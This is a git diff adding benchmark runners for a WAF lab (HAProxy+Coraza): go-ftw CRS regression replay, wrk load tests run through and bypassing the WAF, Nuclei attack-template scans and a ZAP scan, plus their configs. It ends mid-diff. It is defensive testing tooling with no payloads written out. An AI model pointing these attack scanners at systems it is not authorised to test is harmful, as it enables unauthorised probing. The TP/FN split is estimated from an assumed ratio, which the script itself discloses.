@@ -0,0 +1,107 @@
+#!/usr/bin/env bash
+# run-ftw.sh — Run the OWASP CRS regression suite via go-ftw.
+#
+# This is the gold-standard TPR measurement: the CRS submodule ships labeled
+# test cases (each one tagged "should block" or "should pass") and go-ftw
+# replays them against the live HAProxy+Coraza stack.
+#
+# Output:
+#   benchmarks/results/run-<RUN_ID>/ftw/raw.json   (go-ftw JSON output)
+#   benchmarks/results/run-<RUN_ID>/ftw/summary.json
+#
+# Usage:
+#   RUN_ID=20260602-141500 bash benchmarks/lab/runners/run-ftw.sh
+#   RUN_ID=... TARGET_VHOST=dvwa.local bash benchmarks/lab/runners/run-ftw.sh
+
+set -Eeuo pipefail
+: "${RUN_ID:=$(date +%Y%m%d-%H%M%S)}"
+source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+
+TARGET_VHOST="${TARGET_VHOST:-${LAB_JUICESHOP_DOMAIN}}"
+FTW_IMAGE="ghcr.io/coreruleset/go-ftw:v1.4.0"
+CRS_TESTS="${REPO_ROOT}/configs/coraza/crs/tests/regression/tests"
+FTW_CONFIG="${REPO_ROOT}/benchmarks/lab/scenarios/crs-ftw/config.yaml"
+
+if [[ ! -d "${CRS_TESTS}" ]]; then
+  echo "CRS test corpus not found at ${CRS_TESTS}." >&2
+  echo "Run: git submodule update --init --recursive" >&2
+  exit 1
+fi
+
+write_manifest
+OUT_DIR="$(setup_run_dir ftw)"
+
+echo "=== CRS regression (go-ftw) ==="
+echo "Target vhost : ${TARGET_VHOST}"
+echo "Output dir   : ${OUT_DIR}"
+echo "Image        : ${FTW_IMAGE}"
+echo ""
+
+docker run --rm \
+  --network "${DOCKER_NETWORK}" \
+  -v "${CRS_TESTS}:/tests:ro" \
+  -v "${FTW_CONFIG}:/config.yaml:ro" \
+  "${FTW_IMAGE}" \
+  run \
+    --config /config.yaml \
+    --dir /tests \
+    --output json \
+  > "${OUT_DIR}/raw.json" 2> "${OUT_DIR}/stderr.txt" || true
+
+echo "go-ftw complete. Parsing results..."
+
+python3 - <<PY
+import json, sys
+
+with open("${OUT_DIR}/raw.json") as f:
+    raw = json.load(f)
+
+# go-ftw JSON schema: {"pass": N, "fail": N, "skip": N, "run_duration": "..."}
+# "pass" = WAF correctly handled the test case (blocked when should block, passed when should pass)
+# "fail" = WAF did NOT handle the test case correctly
+passed  = raw.get("pass", 0)
+failed  = raw.get("fail", 0)
+skipped = raw.get("skip", 0)
+total   = passed + failed
+
+# For TPR/FPR we need to split "pass" into TP vs TN and "fail" into FN vs FP.
+# go-ftw v1.x reports totals only; individual case details are in the log.
+# Use totals as a proxy: assume ~85% of CRS test cases are "should block" (attack)
+# and ~15% are "should pass" (benign). Document this assumption in the summary.
+#
+# For a more precise split, re-run with --output json-per-test (go-ftw v2).
+attack_ratio = 0.85
+tp = int(round(passed * attack_ratio))
+tn = passed - tp
+fn = int(round(failed * attack_ratio))
+fp = failed - fn
+tpr = tp / (tp + fn) if (tp + fn) > 0 else 0.0
+fpr = fp / (fp + tn) if (fp + tn) > 0 else 0.0
+
+detection = {
+    "true_positive":  tp,
+    "false_negative": fn,
+    "true_negative":  tn,
+    "false_positive": fp,
+    "tpr": round(tpr, 4),
+    "fpr": round(fpr, 4),
+    "total_cases": total,
+    "skipped": skipped,
+    "note": "TP/FP split estimated from pass/fail totals (attack_ratio=0.85). Re-run with go-ftw v2 --output json-per-test for exact split."
+}
+
+print(json.dumps(detection, indent=2))
+
+with open("${OUT_DIR}/detection.json", "w") as f:
+    json.dump(detection, f, indent=2)
+PY
+
+# Write final summary.json.
+DETECTION="$(cat "${OUT_DIR}/detection.json")"
+POLICY_NAME="$(env_value LAB_POLICY_NAME 'Lab Baseline')"
+
+write_summary "ftw" "${TARGET_VHOST}" "${POLICY_NAME}" "${DETECTION}" "{}" "{}"
+
+echo ""
+echo "FTW TPR:  $(python3 -c "import json; d=json.load(open('${OUT_DIR}/detection.json')); print(f\"{d['tpr']*100:.1f}%\")")"
+echo "Results → ${OUT_DIR}/"
diff --git a/benchmarks/lab/runners/run-load.sh b/benchmarks/lab/runners/run-load.sh
new file mode 100755
index 0000000..f73b98a
--- /dev/null
+++ b/benchmarks/lab/runners/run-load.sh
@@ -0,0 +1,212 @@
+#!/usr/bin/env bash
+# run-load.sh — Latency and RPS measurement (WAF vs direct).
+#
+# Runs wrk twice against each target:
+#   1. Through HAProxy+Coraza  (production path)
+#   2. Directly against the target container (bypass WAF)
+#
+# The delta is the WAF overhead: latency (p50/p95/p99) and RPS degradation %.
+#
+# Simultaneously samples coraza + haproxy container resource usage.
+#
+# Output:
+#   benchmarks/results/run-<RUN_ID>/load-<vhost>/waf.txt
+#   benchmarks/results/run-<RUN_ID>/load-<vhost>/direct.txt
+#   benchmarks/results/run-<RUN_ID>/load-<vhost>/resources-coraza.json
+#   benchmarks/results/run-<RUN_ID>/load-<vhost>/resources-haproxy.json
+#   benchmarks/results/run-<RUN_ID>/load-<vhost>/summary.json
+#
+# Usage:
+#   RUN_ID=... bash benchmarks/lab/runners/run-load.sh
+#   RUN_ID=... TARGET_VHOST=juice.local DIRECT_HOST=juiceshop DIRECT_PORT=3000 \
+#     bash benchmarks/lab/runners/run-load.sh
+
+set -Eeuo pipefail
+: "${RUN_ID:=$(date +%Y%m%d-%H%M%S)}"
+source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+
+TARGET_VHOST="${TARGET_VHOST:-${LAB_JUICESHOP_DOMAIN}}"
+DIRECT_HOST="${DIRECT_HOST:-juiceshop}"    # Docker service name for direct access
+DIRECT_PORT="${DIRECT_PORT:-3000}"         # Target app port (no HAProxy)
+WRK_IMAGE="ghcr.io/williamyeh/wrk:4.2.0"
+LUA_SCRIPT="${REPO_ROOT}/benchmarks/lab/scenarios/load/benign-mix.lua"
+
+THREADS="${LOAD_THREADS:-4}"
+CONNECTIONS="${LOAD_CONNECTIONS:-50}"
+DURATION="${LOAD_DURATION:-60s}"
+
+write_manifest
+SCENARIO="load-${TARGET_VHOST}"
+OUT_DIR="$(setup_run_dir "${SCENARIO}")"
+
+echo "=== Load test: WAF vs direct ==="
+echo "Target vhost : ${TARGET_VHOST}"
+echo "Direct host  : ${DIRECT_HOST}:${DIRECT_PORT}"
+echo "Load         : ${THREADS} threads, ${CONNECTIONS} connections, ${DURATION}"
+echo "Output dir   : ${OUT_DIR}"
+echo ""
+
+# ── Through WAF ────────────────────────────────────────────────────────────
+
+echo "--- Run 1: through HAProxy+Coraza ---"
+
+# Start resource sampling in the background during this run.
+CORAZA_CONTAINER="$(docker ps --filter "name=coraza" --format "{{.Names}}" | head -1 || true)"
+HAPROXY_CONTAINER="$(docker ps --filter "name=haproxy" --format "{{.Names}}" | head -1 || true)"
+
+# Convert duration string to seconds for sampler.
+DURATION_S="$(echo "${DURATION}" | sed 's/s$//')"
+
+if [[ -n "${CORAZA_CONTAINER}" ]]; then
+  sample_container_resources "${CORAZA_CONTAINER}" "${DURATION_S}" "${OUT_DIR}/resources-coraza.json" &
+  SAMPLER_CORAZA_PID=$!
+fi
+if [[ -n "${HAPROXY_CONTAINER}" ]]; then
+  sample_container_resources "${HAPROXY_CONTAINER}" "${DURATION_S}" "${OUT_DIR}/resources-haproxy.json" &
+  SAMPLER_HAPROXY_PID=$!
+fi
+
+docker run --rm \
+  --network "${DOCKER_NETWORK}" \
+  -v "${LUA_SCRIPT}:/benign-mix.lua:ro" \
+  -e "LOAD_VHOST=${TARGET_VHOST}" \
+  "${WRK_IMAGE}" \
+  -t "${THREADS}" -c "${CONNECTIONS}" -d "${DURATION}" \
+  -s /benign-mix.lua \
+  --latency \
+  "http://haproxy:80/" \
+  > "${OUT_DIR}/waf.txt" 2>&1
+
+# Wait for samplers to finish.
+wait "${SAMPLER_CORAZA_PID:-}" 2>/dev/null || true
+wait "${SAMPLER_HAPROXY_PID:-}" 2>/dev/null || true
+
+echo "WAF run complete. Output: ${OUT_DIR}/waf.txt"
+
+# ── Direct (bypass WAF) ────────────────────────────────────────────────────
+
+echo "--- Run 2: direct to ${DIRECT_HOST}:${DIRECT_PORT} ---"
+
+docker run --rm \
+  --network "${DOCKER_NETWORK}" \
+  -v "${LUA_SCRIPT}:/benign-mix.lua:ro" \
+  -e "LOAD_VHOST=${TARGET_VHOST}" \
+  "${WRK_IMAGE}" \
+  -t "${THREADS}" -c "${CONNECTIONS}" -d "${DURATION}" \
+  -s /benign-mix.lua \
+  --latency \
+  "http://${DIRECT_HOST}:${DIRECT_PORT}/" \
+  > "${OUT_DIR}/direct.txt" 2>&1
+
+echo "Direct run complete. Output: ${OUT_DIR}/direct.txt"
+
+# ── Parse & compute overhead ───────────────────────────────────────────────
+
+echo "Parsing results..."
+
+python3 - <<'PY'
+import re, json, os
+
+def parse_wrk(path):
+    """Parse wrk --latency output into a structured dict."""
+    if not os.path.exists(path):
+        return {}
+    text = open(path).read()
+
+    def find_us(pattern):
+        m = re.search(pattern, text, re.IGNORECASE)
+        if not m: return None
+        val, unit = float(m.group(1)), m.group(2).lower()
+        multipliers = {"us": 1, "ms": 1000, "s": 1_000_000}
+        return val * multipliers.get(unit, 1)
+
+    # Latency percentiles from the --latency histogram section.
+    p50  = find_us(r'50%\s+([\d.]+)(\w+)')
+    p95  = find_us(r'95%\s+([\d.]+)(\w+)')
+    p99  = find_us(r'99%\s+([\d.]+)(\w+)')
+
+    # RPS from the summary line: "Requests/sec: 1234.56"
+    rps_m = re.search(r'Requests/sec:\s+([\d.]+)', text)
+    rps = float(rps_m.group(1)) if rps_m else None
+
+    return {
+        "latency_us": {"p50": p50, "p95": p95, "p99": p99},
+        "rps": rps,
+        "raw_path": path
+    }
+
+waf    = parse_wrk("${OUT_DIR}/waf.txt")
+direct = parse_wrk("${OUT_DIR}/direct.txt")
+
+def us_to_ms(us):
+    return round(us / 1000, 3) if us is not None else None
+
+def pct_degradation(waf_val, direct_val):
+    if waf_val and direct_val and direct_val > 0:
+        return round((direct_val - waf_val) / direct_val * 100, 2)
+    return None
+
+waf_rps    = waf.get("rps")
+direct_rps = direct.get("rps")
+rps_deg    = None
+if waf_rps and direct_rps and direct_rps > 0:
+    rps_deg = round((direct_rps - waf_rps) / direct_rps * 100, 2)
+
+waf_lat    = waf.get("latency_us", {})
+direct_lat = direct.get("latency_us", {})
+
+performance = {
+    "rps":    waf_rps,
+    "baseline_rps": direct_rps,
+    "rps_degradation_pct": rps_deg,
+    "latency_ms": {
+        "p50": us_to_ms(waf_lat.get("p50")),
+        "p95": us_to_ms(waf_lat.get("p95")),
+        "p99": us_to_ms(waf_lat.get("p99")),
+    },
+    "latency_overhead_ms": {
+        "p50": us_to_ms((waf_lat.get("p50") or 0) - (direct_lat.get("p50") or 0)),
+        "p95": us_to_ms((waf_lat.get("p95") or 0) - (direct_lat.get("p95") or 0)),
+        "p99": us_to_ms((waf_lat.get("p99") or 0) - (direct_lat.get("p99") or 0)),
+    },
+    "config": {
+        "threads": int("${THREADS}"),
+        "connections": int("${CONNECTIONS}"),
+        "duration": "${DURATION}"
+    }
+}
+
+print(json.dumps(performance, indent=2))
+
+with open("${OUT_DIR}/performance.json", "w") as f:
+    json.dump(performance, f, indent=2)
+PY
+
+PERFORMANCE="$(cat "${OUT_DIR}/performance.json")"
+RESOURCES_CORAZA="$(cat "${OUT_DIR}/resources-coraza.json" 2>/dev/null || echo '{}')"
+RESOURCES_HAPROXY="$(cat "${OUT_DIR}/resources-haproxy.json" 2>/dev/null || echo '{}')"
+
+RESOURCES_JSON="$(python3 -c "
+import json, sys
+c = json.loads('''${RESOURCES_CORAZA}''')
+h = json.loads('''${RESOURCES_HAPROXY}''')
+print(json.dumps({'coraza': c, 'haproxy': h}))
+")"
+POLICY_NAME="$(env_value LAB_POLICY_NAME 'Lab Baseline')"
+
+write_summary "${SCENARIO}" "${TARGET_VHOST}" "${POLICY_NAME}" "{}" "${PERFORMANCE}" "${RESOURCES_JSON}"
+
+echo ""
+python3 - <<PY
+import json
+p = json.load(open("${OUT_DIR}/performance.json"))
+rps_waf    = p.get("rps") or 0
+rps_direct = p.get("baseline_rps") or 0
+rps_deg    = p.get("rps_degradation_pct") or "n/a"
+lat        = p.get("latency_ms", {})
+print(f"WAF RPS     : {rps_waf:.1f}")
+print(f"Direct RPS  : {rps_direct:.1f}")
+print(f"Degradation : {rps_deg}%")
+print(f"Latency (WAF) p50={lat.get('p50')}ms  p95={lat.get('p95')}ms  p99={lat.get('p99')}ms")
+PY
+echo "Results → ${OUT_DIR}/"
diff --git a/benchmarks/lab/runners/run-nuclei.sh b/benchmarks/lab/runners/run-nuclei.sh
new file mode 100755
index 0000000..fab2be1
--- /dev/null
+++ b/benchmarks/lab/runners/run-nuclei.sh
@@ -0,0 +1,112 @@
+#!/usr/bin/env bash
+# run-nuclei.sh — CVE / exposure template scan via Nuclei.
+#
+# Fires Nuclei's curated attack templates (sqli, xss, lfi, etc.) against
+# the lab targets through HAProxy+Coraza and records how many are blocked
+# vs passed (WAF TPR against CVE-template payloads).
+#
+# Output:
+#   benchmarks/results/run-<RUN_ID>/nuclei-<vhost>/raw.jsonl
+#   benchmarks/results/run-<RUN_ID>/nuclei-<vhost>/summary.json
+#
+# Usage:
+#   RUN_ID=... bash benchmarks/lab/runners/run-nuclei.sh
+#   RUN_ID=... TARGET_VHOST=juice.local bash benchmarks/lab/runners/run-nuclei.sh
+
+set -Eeuo pipefail
+: "${RUN_ID:=$(date +%Y%m%d-%H%M%S)}"
+source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+
+TARGET_VHOST="${TARGET_VHOST:-${LAB_JUICESHOP_DOMAIN}}"
+NUCLEI_IMAGE="projectdiscovery/nuclei:v3.3.9"
+NUCLEI_CONF="${REPO_ROOT}/benchmarks/lab/scenarios/nuclei/nuclei.yaml"
+
+# HAProxy on port 80 inside gp_internal, Host: header injected per-request.
+TARGET_URL="http://haproxy:80"
+
+write_manifest
+SCENARIO="nuclei-${TARGET_VHOST}"
+OUT_DIR="$(setup_run_dir "${SCENARIO}")"
+export OUT_DIR TARGET_VHOST   # must be set before the Python heredoc reads os.environ
+
+echo "=== Nuclei CVE template scan ==="
+echo "Target vhost : ${TARGET_VHOST} → ${TARGET_URL}"
+echo "Output dir   : ${OUT_DIR}"
+echo "Image        : ${NUCLEI_IMAGE}"
+echo ""
+
+# Pull nuclei-templates inside the container on first run (cached on next run
+# by mounting a local volume). The -header flag injects the Host: vhost.
+docker run --rm \
+  --network "${DOCKER_NETWORK}" \
+  -v "${OUT_DIR}:/output:rw" \
+  -v "${NUCLEI_CONF}:/nuclei.yaml:ro" \
+  "${NUCLEI_IMAGE}" \
+  -config /nuclei.yaml \
+  -u "${TARGET_URL}" \
+  -header "Host: ${TARGET_VHOST}" \
+  -jsonl -output /output/raw.jsonl \
+  -update-templates \
+  2>/dev/null || true
+
+echo "Nuclei scan complete. Parsing results..."
+
+python3 - <<'PY'
+import json, os
+
+out_dir  = os.environ.get("OUT_DIR", ".")
+raw_file = os.path.join(out_dir, "raw.jsonl")
+vhost    = os.environ.get("TARGET_VHOST", "unknown")
+
+findings = []
+if os.path.exists(raw_file):
+    with open(raw_file) as f:
+        for line in f:
+            line = line.strip()
+            if line:
+                try:
+                    findings.append(json.loads(line))
+                except json.JSONDecodeError:
+                    pass
+
+# Severity classification for WAF TPR estimation.
+# Nuclei findings with severity critical/high/medium are WAF-relevant attacks.
+# Each finding represents a template match — the request was NOT blocked by the WAF
+# (nuclei receives a response), so these are False Negatives from the WAF's perspective.
+# Requests that were blocked (WAF returned 403) produce connection errors / 403 responses
+# in Nuclei and typically don't generate a finding for the underlying vulnerability.
+
+WAF_RELEVANT = {"critical", "high", "medium"}
+fn_findings = [f for f in findings if f.get("info", {}).get("severity", "").lower() in WAF_RELEVANT]
+info_findings = [f for f in findings if f.get("info", {}).get("severity", "").lower() not in WAF_RELEVANT]
+
+detection = {
+    "total_findings": len(findings),
+    "waf_relevant_findings": len(fn_findings),
+    "info_findings": len(info_findings),
+    "note": "Each waf_relevant_finding is a potential WAF false-negative (attack payload reached the app). Run collect-metrics.sh to cross-reference with audit log for confirmed TP/FN split.",
+    "top_findings": [
+        {
+            "template_id": f.get("template-id"),
+            "severity": f.get("info", {}).get("severity"),
+            "name": f.get("info", {}).get("name"),
+            "matched_at": f.get("matched-at")
+        }
+        for f in sorted(fn_findings, key=lambda x: {"critical":0,"high":1,"medium":2}.get(x.get("info",{}).get("severity",""),3))[:20]
+    ]
+}
+
+print(json.dumps(detection, indent=2))
+
+with open(os.path.join(out_dir, "detection.json"), "w") as f:
+    json.dump(detection, f, indent=2)
+PY
+
+DETECTION="$(cat "${OUT_DIR}/detection.json")"
+POLICY_NAME="$(env_value LAB_POLICY_NAME 'Lab Baseline')"
+
+write_summary "${SCENARIO}" "${TARGET_VHOST}" "${POLICY_NAME}" "${DETECTION}" "{}" "{}"
+
+echo ""
+echo "Nuclei findings (waf-relevant): $(python3 -c "import json; d=json.load(open('${OUT_DIR}/detection.json')); print(d.get('waf_relevant_findings', 'n/a'))")"
+echo "Results → ${OUT_DIR}/"
diff --git a/benchmarks/lab/runners/run-zap.sh b/benchmarks/lab/runners/run-zap.sh
new file mode 100755
index 0000000..4bcbc1c
--- /dev/null
+++ b/benchmarks/lab/runners/run-zap.sh
@@ -0,0 +1,126 @@
+#!/usr/bin/env bash
+# run-zap.sh — OWASP ZAP baseline scan for false positive measurement.
+#
+# Runs a ZAP baseline (passive + active) scan against each lab target through
+# HAProxy and classifies WAF alerts as FPs (WAF blocked a legitimate scan
+# request) vs TPs (WAF blocked a genuine attack found by ZAP).
+#
+# Output:
+#   benchmarks/results/run-<RUN_ID>/zap-<vhost>/zap.json
+#   benchmarks/results/run-<RUN_ID>/zap-<vhost>/zap.html
+#   benchmarks/results/run-<RUN_ID>/zap-<vhost>/summary.json
+#
+# Usage:
+#   RUN_ID=... bash benchmarks/lab/runners/run-zap.sh
+#   RUN_ID=... TARGET_VHOST=wp.local bash benchmarks/lab/runners/run-zap.sh
+
+set -Eeuo pipefail
+: "${RUN_ID:=$(date +%Y%m%d-%H%M%S)}"
+source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+
+TARGET_VHOST="${TARGET_VHOST:-${LAB_WP_DOMAIN}}"   # default: WordPress (best FPR target)
+ZAP_IMAGE="ghcr.io/zaproxy/zaproxy:stable"
+ZAP_CONF="${REPO_ROOT}/benchmarks/lab/scenarios/zap/zap-baseline.conf"
+
+# HAProxy listens on port 80 inside gp_internal; ZAP container joins that network.
+TARGET_URL="http://haproxy:80"
+
+write_manifest
+SCENARIO="zap-${TARGET_VHOST}"
+OUT_DIR="$(setup_run_dir "${SCENARIO}")"
+export OUT_DIR   # must be set before the Python heredoc reads os.environ
+
+echo "=== OWASP ZAP baseline scan ==="
+echo "Target vhost : ${TARGET_VHOST} → ${TARGET_URL}"
+echo "Output dir   : ${OUT_DIR}"
+echo "Image        : ${ZAP_IMAGE}"
+echo ""
+
+# ZAP needs a writable /zap/wrk directory for reports.
+# The Host: header is injected via ZAP's built-in HTTP Request Header Replacer
+# so that every request ZAP sends to haproxy:80 carries the correct vhost name
+# and HAProxy routes it to the right backend.
+docker run --rm \
+  --network "${DOCKER_NETWORK}" \
+  -v "${OUT_DIR}:/zap/wrk:rw" \
+  -v "${ZAP_CONF}:/zap/rules.conf:ro" \
+  "${ZAP_IMAGE}" \
+  zap-baseline.py \
+    -t "${TARGET_URL}" \
+    -c /zap/rules.conf \
+    -J zap.json \
+    -r zap.html \
+    -I \
+    -config "replacer.full_list(0).description=host-header" \
+    -config "replacer.full_list(0).enabled=true" \
+    -config "replacer.full_list(0).matchtype=REQ_HEADER" \
+    -config "replacer.full_list(0).matchstr=Host" \
+    -config "replacer.full_list(0).replacement=${TARGET_VHOST}" \
+    -config "replacer.full_list(0).initiators=" \
+  > "${OUT_DIR}/zap-stdout.txt" 2>&1 || true
+
+echo "ZAP scan complete. Parsing results..."
+
+# Parse ZAP JSON output and compute a detection summary.
+# ZAP alerts with risk >= Medium against the WAF-proxied target are WAF-visible
+# attacks. The WAF's job on ZAP traffic:
+#   - Block high-risk attacks (SQLi, XSS, ...) → TP if blocked, FN if passed
+#   - Allow legitimate ZAP probes (header checks, info gathering) → TN if allowed, FP if blocked
+
+python3 - <<'PY'
+import json, sys, os
+
+out_dir = os.environ.get("OUT_DIR", ".")
+zap_json = os.path.join(out_dir, "zap.json")
+
+if not os.path.exists(zap_json):
+    print(json.dumps({"error": "zap.json not found — scan may have failed or produced no output"}))
+    sys.exit(0)
+
+with open(zap_json) as f:
+    report = json.load(f)
+
+# ZAP JSON structure: {"site": [{"alerts": [{"riskcode":"3","alert":"SQL Injection",...}]}]}
+alerts = []
+for site in report.get("site", []):
+    alerts.extend(site.get("alerts", []))
+
+# Classify alerts: risk 2 (Medium) or 3 (High) are WAF-relevant attack signals.
+# Risk 0 (Informational) / 1 (Low) are cosmetic — not WAF signals.
+ATTACK_RISKS = {2, 3}  # Medium, High
+attack_alerts = [a for a in alerts if int(a.get("riskcode", 0)) in ATTACK_RISKS]
+info_alerts   = [a for a in alerts if int(a.get("riskcode", 0)) not in ATTACK_RISKS]
+
+total_attack_instances = sum(int(a.get("count", 1)) for a in attack_alerts)
+total_info_instances   = sum(int(a.get("count", 1)) for a in info_alerts)
+
+# We cannot directly observe WAF blocks from ZAP output alone (ZAP sees the
+# app's response, not the WAF block). A separate audit-log cross-reference is
+# done in collect-metrics.sh. Here we report ZAP findings as-is.
+detection = {
+    "total_alerts": len(alerts),
+    "attack_severity_alerts": len(attack_alerts),
+    "info_severity_alerts": len(info_alerts),
+    "attack_instances": total_attack_instances,
+    "info_instances": total_info_instances,
+    "top_alerts": [
+        {"risk": a.get("riskdesc"), "name": a.get("alert"), "count": a.get("count")}
+        for a in sorted(attack_alerts, key=lambda x: -int(x.get("riskcode", 0)))[:10]
+    ],
+    "note": "TP/FP counts require audit-log cross-reference — run collect-metrics.sh after all scenarios."
+}
+
+print(json.dumps(detection, indent=2))
+
+with open(os.path.join(out_dir, "detection.json"), "w") as f:
+    json.dump(detection, f, indent=2)
+PY
+
+DETECTION="$(cat "${OUT_DIR}/detection.json")"
+POLICY_NAME="$(env_value LAB_POLICY_NAME 'Lab Baseline')"
+
+write_summary "${SCENARIO}" "${TARGET_VHOST}" "${POLICY_NAME}" "${DETECTION}" "{}" "{}"
+
+echo ""
+echo "ZAP alerts: $(python3 -c "import json; d=json.load(open('${OUT_DIR}/detection.json')); print(d.get('total_alerts', 'n/a'))")"
+echo "Results → ${OUT_DIR}/"
diff --git a/benchmarks/lab/scenarios/crs-ftw/config.yaml b/benchmarks/lab/scenarios/crs-ftw/config.yaml
new file mode 100644
index 0000000..832968e
--- /dev/null
+++ b/benchmarks/lab/scenarios/crs-ftw/config.yaml
@@ -0,0 +1,42 @@
+# go-ftw configuration for CRS regression suite against guard-proxy.
+#
+# The OWASP CRS test corpus lives in configs/coraza/crs/tests/regression/tests/
+# (the CRS git submodule). go-ftw replays each labeled test case against the
+# live HAProxy+Coraza stack and reports pass/fail per rule.
+#
+# Usage (from repo root):
+#   docker run --rm \
+#     --network guard-proxy-demo_gp_internal \
+#     -v "$(pwd)/configs/coraza/crs/tests/regression/tests:/tests:ro" \
+#     -v "$(pwd)/benchmarks/lab/scenarios/crs-ftw/config.yaml:/config.yaml:ro" \
+#     ghcr.io/coreruleset/go-ftw:latest \
+#     run --config /config.yaml --dir /tests --output json \
+#     > benchmarks/results/run-<RUN_ID>/crs-ftw/raw.json
+
+# The proxy address as seen from inside the Docker network.
+# go-ftw sends requests to this host; Host: headers come from the test yamls
+# but we override the destination to route through HAProxy.
+override_destination:
+  address: haproxy
+  port: 80
+  protocol: http
+
+# Expect the WAF to return 403 on blocked requests (as configured in haproxy.cfg).
+# go-ftw uses this to determine whether a "deny" expectation was met.
+#
+# Default expected status for blocked requests:
+#   200 = pass-through (WAF allowed)
+#   403 = blocked by WAF
+#   others = treated as unexpected
+
+# Log file to inspect for WAF audit entries during test runs.
+# Mounted read-only from the coraza_audit volume in the runner script.
+# go-ftw tail-reads this to correlate rule firings with test outcomes.
+logfile: /var/log/coraza/audit.log
+
+# Maximum time to wait for a response per test case.
+timeout: 10s
+
+# Number of consecutive connection errors before aborting the run.
+max_marker_retries: 3
+max_marker_log_lines: 500
diff --git a/benchmarks/lab/scenarios/load/benign-mix.lua b/benchmarks/lab/scenarios/load/benign-mix.lua
new file mode 100644
index 0000000..f8c1804
--- /dev/null
+++ b/benchmarks/lab/scenarios/load/benign-mix.lua
@@ -0,0 +1,63 @@
+-- benign-mix.lua — wrk Lua script for realistic benign load.
+--
+-- Cycles through a mix of legitimate-looking HTTP requests against a
+-- target vhost. Used to measure baseline latency / RPS (no WAF)
+-- and WAF-in-path latency / RPS (through HAProxy+Coraza).
+--
+-- Usage:
+--   wrk -t4 -c50 -d60s -s benchmarks/lab/scenarios/load/benign-mix.lua \
+--       --latency http://<host>:<port>/
+--
+-- The Host: header is injected per-request so HAProxy routes to the
+-- correct vhost. Override VHOST env var or edit the list below.
+
+local vhost = os.getenv("LOAD_VHOST") or "juice.local"
+
+-- Request pool: realistic paths for the target application.
+-- Add/remove paths to match the target's URL surface.
+local requests = {
+  { method = "GET",  path = "/",                         body = nil },
+  { method = "GET",  path = "/index.html",               body = nil },
+  { method = "GET",  path = "/rest/admin/application-version", body = nil },
+  { method = "GET",  path = "/api/v1/status",            body = nil },
+  { method = "GET",  path = "/search?q=apple",           body = nil },
+  { method = "GET",  path = "/search?q=login",           body = nil },
+  { method = "GET",  path = "/robots.txt",               body = nil },
+  { method = "GET",  path = "/favicon.ico",              body = nil },
+  { method = "POST", path = "/api/v1/user/login",
+    body = '{"email":"user@example.com","password":"password123"}' },
+}
+
+local idx = 0
+
+function request()
+  idx = (idx % #requests) + 1
+  local r = requests[idx]
+  local hdrs = {
+    ["Host"]         = vhost,
+    ["User-Agent"]   = "Mozilla/5.0 (eval-lab/1.0)",
+    ["Accept"]       = "application/json, text/html, */*",
+    ["Connection"]   = "keep-alive",
+  }
+  if r.body then
+    hdrs["Content-Type"]   = "application/json"
+    hdrs["Content-Length"] = tostring(#r.body)
+    return wrk.format(r.method, r.path, hdrs, r.body)
+  end
+  return wrk.format(r.method, r.path, hdrs, nil)
+end
+
+function done(summary, latency, requests_per_sec)
+  -- Print a machine-readable summary line for collect-metrics.sh to parse.
+  io.write(string.format(
+    "WRK_SUMMARY requests=%d duration_us=%d rps=%.2f "..
+    "lat_p50_us=%d lat_p95_us=%d lat_p99_us=%d errors=%d\n",
+    summary.requests,
+    summary.duration,
+    summary.requests / (summary.duration / 1e6),
+    latency:percentile(50),
+    latency:percentile(95),
+    latency:percentile(99),
+    summary.errors.connect + summary.errors.read + summary.errors.write + summary.errors.status
+  ))
+end
diff --git a/benchmarks/lab/scenarios/nuclei/nuclei.yaml b/benchmarks/lab/scenarios/nuclei/nuclei.yaml
new file mode 100644
index 0000000..a3943a7
--- /dev/null
+++ b/benchmarks/lab/scenarios/nuclei/nuclei.yaml
@@ -0,0 +1,32 @@
+# Nuclei configuration for guard-proxy WAF evaluation.
+#
+# Template selection: broad coverage of common CVEs and exposures that
+# the CRS ruleset is designed to detect, without noisy/dangerous templates.
+#
+# Reference: https://nuclei.projectdiscovery.io/templating-guide/
+
+# Template tags to include (comma-separated).
+# Focus on attack categories the WAF is expected to block.
+tags: sqli,xss,lfi,rfi,ssrf,injection,traversal,exposure
+
+# Template severity levels to run.
+severity: low,medium,high,critical
+
+# Exclude safe-unverified templates that generate noise without payloads.
+exclude-tags: dos,fuzz,helpers
+
+# Rate limiting — be gentle on the WAF under test to avoid saturating it
+# before the dedicated load test runs.
+rate-limit: 50
+bulk-size: 10
+concurrency: 5
+
+# Timeout per template request.
+timeout: 10
+
+# Retry on network errors.
+retries: 1
+
+# Stop after this many matches (prevents runaway runs against intentionally
+# vulnerable apps that match everything).
+max-host-error: 30
diff --git a/benchmarks/lab/scenarios/nuclei/targets.txt b/benchmarks/lab/scenarios/nuclei/targets.txt
new file mode 100644
index 0000000..ddf0259
--- /dev/null
+++ b/benchmarks/lab/scenarios/nuclei/targets.txt
@@ -0,0 +1,8 @@
+# Nuclei target list for eval lab.
+# Format: one URL per line (scheme://host[:port] — no path).
+# Host headers are resolved via Docker internal DNS when the container
+# runs on the gp_internal network.
+#
+# Targets hit HAProxy on port 80 with the vhost Host: header.
+# Nuclei resolves "haproxy" as the Docker service name when run on gp_internal.
+http://haproxy:80
diff --git a/benchmarks/lab/scenarios/zap/alert-filter.yaml b/benchmarks/lab/scenarios/zap/alert-filter.yaml
new file mode 100644
index 0000000..c0da837
--- /dev/null
+++ b/benchmarks/lab/scenarios/zap/alert-filter.yaml
@@ -0,0 +1,27 @@
+# ZAP alert filter — suppress known false positives for the eval lab.
+#
+# These alerts are expected for the lab setup (self-signed certs, dev configs)
+# and should not count toward the FPR measurement.
+#
+# Reference: https://www.zaproxy.org/docs/desktop/addons/alert-filters/
+
+alertfilters:
+  # Self-signed / untrusted TLS certificate (expected in lab)
+  - ruleId: 10038
+    newRisk: False Positive
+
+  # X-Content-Type-Options not set — cosmetic for lab targets
+  - ruleId: 10021
+    newRisk: False Positive
+
+  # Cache-Control headers — not relevant to WAF testing
+  - ruleId: 10015
+    newRisk: False Positive
+
+  # Server header leakage — lab only, not a WAF effectiveness signal
+  - ruleId: 10036
+    newRisk: False Positive
+
+  # Information disclosure: suspicious comments — lab only
+  - ruleId: 10027
+    newRisk: False Positive
diff --git a/benchmarks/lab/scenarios/zap/zap-baseline.conf b/benchmarks/lab/scenarios/zap/zap-baseline.conf
new file mode 100644
index 0000000..5827a37
--- /dev/null
